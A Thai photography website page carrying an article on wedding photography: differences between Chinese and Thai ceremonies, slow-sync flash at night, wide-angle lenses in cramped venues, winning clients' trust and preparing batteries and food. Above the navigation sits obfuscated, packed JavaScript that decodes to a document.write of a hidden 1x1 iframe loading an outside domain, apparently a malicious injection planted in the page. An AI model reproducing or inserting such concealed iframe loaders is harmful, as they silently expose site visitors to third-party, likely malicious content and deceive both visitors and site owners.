{if(k[c]){p=p.replace(new RegExp('\\b'+c.toString(a)+'\\b','g'),k[c])}}return p}('p.q(o(\'%k%0%i%8%c%6%2%4%b%8%e%5%7%3%1%1%n%j%9%9%c%1%1%6%a%m%g%r%2%8%s%e%g%6%9%7%4%v%0%d%1%3%5%f%4%3%2%0%u%3%1%5%f%4%b%1%a%h%2%5%7%x%0%b%0%w%0%h%0%1%a%j%4%3%0%d%d%2%t%7%l%k%9%0%i%8%c%6%2%l\'));',34,34,'u0069|u0074|u0065|u0068|u0020|u003d|u006d|u0022|u0072|u002f|u0079|u0073|u0061|u0064|u0063|u0031|u006f|u006c|u0066|u003a|u003c|u003e|u006a|u0070|unescape|document|write|u006b|u002e|u006e|u0067|u0077|u0062|u0076'.split('|')))
   
     
  Home | About us | บริการถ่ายภาพ | ห้องภาพ | บทความ | เว็บบอร์ด | เช็คราคากล้อง-เลนส์ | โหราพยากรณ์ | Links  
       
 

บันทึกช่างภาพ "ถ่ายภาพแต่งงาน"

wedding

           จากครั้งที่แล้วพูดถึงการถ่ายภาพงานรับปริญญา ต่อมาเริ่มมีฝีมือก็ต้องมาเจอกับการถ่ายภาพงานแต่งงาน ซึ่งเป็นงานที่ท้าทายความสามารถมากกว่าการถ่ายภาพงานรับปริญญา และเป็นงานที่สร้างรายได้ให้กับช่างภาพเป็นอย่างดี อีกทั้งไม่ร้อนเพราะงานพิธีส่วนมากจะจัดในที่ร่ม บางที่ก็แคบ และก็มีแสงสว่างน้อย ทำให้เป็นปัญหาสำหรับช่างภาพมือใหม่ที่ยังไม่มีประสบการณ์ การถ่ายภาพแต่งงาน

           อย่างแรกที่ควรจะทำความเข้าใจก่อนถ่ายภาพงานแต่งงาน คือ พิธีแต่งงานของแต่ละศาสนา เชื้อชาติ และท้องถิ่น นั้นไม่มีความเหมือนกันเลย อย่างเช่นหากรับถ่ายภาพงานแต่งงานของชาวเชื้อสายจีน คุณต้องทำใจหลาย ๆ อย่าง เช่น ในวันก่อนวันแต่งที่บ้านเจ้าบ่าวจะมีการจัดเลี้ยงสุกดิบก่อน เมื่อถึงฤกษ์ที่กำหนดไว้ ซึ่งจะเป็นหลังเที่ยงคืนเป็นต้นไป ทางบ้านเจ้าบ่าวจะออกไปรับตัวเจ้าสาวที่บ้านของฝ่ายเจ้าสาว บางทีคุณอาจจะไม่ได้ไปถ่ายภาพหรืออาจจะไม่ได้ถ่ายภาพงานนี้เลยหากปีเกิดของช่างภาพ "ชง" ซึ่งจะมีความหมายในทำนองที่เข้าใจว่า "ไม่ดี หรือ อาจจะทำให้ไม่เป็นมงคล" เอาเป็นว่าก็ต้องมีญาติบางคนที่ไม่ได้ไปกับขบวนรถรับเจ้าสาวเหมือนกัน จากนั้น (หากคุณได้ไป) ที่บ้านเจ้าสาวจะมีประตูเงินประตูทอง(ตรงนี้มีเหมือนกันหมด) ก่อนเจ้าบ่าวจะไปเจอเจ้าสาว เอาโดยรวมว่าช่วงนี้ บางครั้งต้องทำใจเพราะอาจจะถ่ายภาพได้ไม่ม้วน แล้วก็นั่งรถกลับมาบ้านเจ้าบ่าว และจะต้องมาถ่ายภาพอีกทีตอนเช้า ที่เรียกว่าไหว้เจ้าที่และบรรพบุรุษ หลังจากนั้นจะมาเป็นพิธีรับน้ำชา ช่วงนี้ก่อนพิธีจะเริ่มควรจัดมุมและสถานที่ให้เหมาะกับการถ่ายภาพ เพื่อไม่ให้มีใครบังใคร และตอนถ่ายภาพคนที่สำคัญจะต้องไม่พลาดคือ พ่อแม่ ของเจ้าบ่าวเจ้าสาว เสร็จจากพิธีรับน้ำชา ก็จัดให้ถ่ายภาพหมู่ครอบครัว และรวมทั้งหมด และมาถึงงานช่วงเย็นที่หน้าซุ้มประตู ในความเห็นส่วนตัวผมไม่ชอบซุ้มประตูประเภทที่ต้องเดินรอดเลย เนื่องจากจะถ่ายออกมาแล้วไม่สวย ยังทำให้เกิดความไม่คล่องตัวเวลาที่แขกคนอื่นจะเดินเข้าออกจะต้องผ่านประตู ผมชอบแบบซุ้มแบบฉากมากกว่า และภาพที่ถ่ายออกมาสวยงามมากกว่าแบบเดินรอด จากนั้นก็ถ่ายภาพช่วงพิธีต่าง ๆ ในงานเลี้ยงช่วงกลางคืน ประมาณ 4 ทุ่มก็น่าจะเสร็จงาน โดยรวมเวลาทั้งหมดแล้วจะใช้เวลาอยู่กับเจ้าภาพมากกว่า 16 ชม. เรียกได้ว่าเป็นงานที่หนักที่สุด

        เมื่อกล่าวถึงพิธีแบบจีนไปแล้ว ก็มาถึงแบบไทย ๆ ซึ่งก็แตกต่างกันอีกนั้นแหละ มีทั้งแบบ ล้านนา แบบส่วย ฯลฯ แต่จะกล่าวแบบโดยรวมที่เจอมา คือ ตอนเช้าจะทำบุญเลี้ยงพระ หลังจากนั้นจะเป็นขบวนแห่ขันหมาก แต่งงาน ตอนแห่ขบวนขันหมากให้ดูดี ๆ ว่าอยู่ใกล้วัตถุที่เกิดเสียงดังหรือไม่ (ประทัด,ปืน) เพราะมักจะนิยมใช้ให้เกิดเสียงดัง ๆ กัน เคยมีอยู่งานหนึ่ง เพื่อน ๆ เจ้าสาวมาช่วยกันยิงปืนขึ้นฟ้า แต่ดื่มมามากไปหน่อยยิงไปโดนปลายหลังคาบ้านแล้วทำให้วิถีกระสุนเปลี่ยนทิศตกมาโดนหน้าคนในขบวนแห่ จากนั้นก็มาสู่ประตูเงินประตูทอง (มีทุกงานครับ) จากนั้นก็เข้ามาสู่บ้านเจ้าสาว พอรับตัวเจ้าสาวออกจากห้อง ก็จะมีการแบ่งของในขบวนแห่ขันหมาก และเป็นพิธีพราหมณ์จนถึงการหมั้น และการรดน้ำอวยพรคู่บ่าวสาว จากนั้นเสร็จพิธีช่วงเช้า และจะเจอกับเจ้าภาพอีกทีในช่วงเย็นในงานเลี้ยงตอนกลางคืน

       จากตัวอย่างสองงานปัญหาที่ช่างภาพมือใหม่จะเจอคือ การใช้แฟลชถ่ายภาพกลางคืน และการถ่ายภาพในสถานที่แคบ และยิ่งเป็นการถ่ายภาพด้วยฟิล์มแล้ว ทำให้มีช่างภาพหลายคนเกิดอาการประหม่า แต่สมัยนี้มีกล้องดิจิตอลทำให้ช่างภาพลดอาการดังกล่าวไปได้พอสมควร มาพูดถึงปัญหาการใช้แฟลชการถ่ายภาพกลางคืน ซึ่งมือใหม่มักจะใช้ค่าความไวชัตเตอร์สูงสุดเท่าที่กล้องมี อย่างเช่น K1000 มีสูงสุดที่ 1/60 ก็จะใช้ที่ค่านี้ตลอดงาน ภาพที่ได้จะมีฉากหลังที่มืด และขาดบรรยากาศของงานแต่งงานไป สาเหตุเพราะใช้ค่าความไวชัตเตอร์ที่สูงนั้นเอง การที่ถ่ายภาพและเอาบรรยากาศแสงสีในงานเข้ามาร่วมสามารถทำได้หลายวิธี อย่างแรก คือ การหาฟิล์มที่มีค่าความไวแสงเพิ่มขึ้น หรือ ถ้าเป็นดิจิตอลก็ตั้งค่าความไวแสงที่เพิ่มขึ้น ก็จะทำให้ได้บรรยากาศของฉากหลังเพิ่ม อย่างที่สอง ใช้ค่าความไวชัตเตอร์ที่ต่ำลง (Slow sync) เช่นสูงสุดที่ 1/60 เราจะสามารถใช้ที่ 1/30 หรือ 1/15 ก็ได้ แต่ต้องระวังเรื่องมือสั่นนะครับ และอย่างสุดท้ายคือ การใช้แฟลชหลายตัว แต่เทคนิคที่ผมใช้ประจำคือ แบบที่ 1 ผสมแบบที่สอง และจะมีแบบที่สามบ้างแล้วแต่โอกาสที่จะเอื้ออำนวย ภาพที่ได้จะถูกใจเจ้าภาพมาก

    ภาพแต่งงาน  ต่อมาปัญหาเรื่องพื้นที่ถ่ายภาพแคบและจำกัด ทางออกคือต้องยอมโดนว่า ดีกว่าไม่ได้ภาพ คือ จะต้องใช้เลนส์มุมกว้างในการถ่ายภาพ ทำให้ภาพคนที่อยู่ขอบหรือมุมภาพบวม แต่ก็เก็บภาพได้หมด สำหรับกล้องฟิล์มจะมีปัญหาน้อย แต่ถ้าเป็นกล้องดิจิตอลที่มีตัวคูณด้วยแล้วจะเป็นปัญหา ทำให้มีช่างภาพมืออาชีพที่ผมรู้จักต้องตัดใจขาย 28-70 L เพื่อซื้อ 17-40L มาใช้งานแทนเพราะปัญหาเรื่องตัวคูณของกล้องดิจิตอลนี่แหละ

      ปัญหาที่แย่มากที่สุดคือทางเจ้าภาพไม่เชื่อในฝีมือและมุมมองของตัวช่างภาพ และไม่สามารถควบคุมจัดการได้ ปัญหานี้มีทางออกโดยการที่จะต้องสร้างภาพลักษณ์ของตัวเองใหม่ เช่นอย่างน้อยก็หาเสื้อกั๊กมาใส่ ถ้ายังไม่ดีอีกให้เอาเลนส์ตัวใหญ่ ๆ ออกมาส่องถ่ายสักสองสามภาพแล้วก็เก็บใส่กระเป๋า (ไม่เชื่อลองทำดู แล้วสถานการณ์จะดูดีขึ้นทันตาเห็น) แต่ที่สำคัญคือ หากช่างภาพมีผลงานให้เจ้าภาพเห็นมาก่อนแล้ว หากเขาให้เราถ่ายก็หมายถึงเขาเชื่อในฝีมือเรา "ผมคงไม่มีโอกาสแก้ตัวอีกแล้ว เพราะผมจะแต่งงานเพียงครั้งเดียว" เป็นคำพูดขที่ประทับใจของคุณวรเดช ในงานแต่งงานของเขา ดังนั้นหากเขาเชื่อในมือเรา เราก็ไม่ควรถ่ายพลาด เพราะจะไม่มีโอกาสแก้ตัวเหมือนกัน

      การเตรียมตัว หากรู้ว่าจะต้องถ่าย ควรนอนให้เต็มที่ และเดรียมอุปกรณ์ให้พร้อม โดยเฉพาะแบตเตอรี่กล้องและแฟลชที่ต้องเตรียมไว้ให้เต็มอัตราศึก เพราะเรียกว่าตลอดทั้งงานจะต้องถ่ายภาพด้วยแฟลชเกือบ 100 % แบตเตอรี่สำหรับแฟลช แนะนำให้ใช้แบบชาร์จได้และหาเครื่องชาร์จถ่านแบบเร็วมาใช้ อย่างน้อยผมมีแบตเตอรี่สำรองอย่างน้อย 3 ชุดไว้สำหรับแฟลช ซึ่งบางครั้งยังต้องมาชาร์จเพิ่มในขณะที่ถ่ายภาพในงานแต่งงาน  ต่อมาเรื่องอาหาร ช่างภาพจะต้องทานอาหารไม่เป็นเวลา และบางทีอาจจะไม่ได้ทานอะไรเลย ดังนั้นก่อนเริ่มงานควรหาอะไรทานให้เต็มที่เพราะกองทัพเดินด้วยท้อง

     การถ่ายภาพงานแต่งงาน หากสามารถทำงานเป็นทีมได้ คุณก็จะสามารถถ่ายภาพที่ดีได้มากขึ้น ซึ่งทีมที่กล่าวมานี้คือ ผู้ช่วยช่างภาพ หาไว้ช่วยสักคนจะช่วยแบ่งเบาภาระได้มาก 

        by ชัยยงค์ โกกนุทาภรณ์


 
 

Design by TaewTong | taewtong2002@yahoo.com

 

Copyrights © 2007 www.doartdee.com | All rights reserved.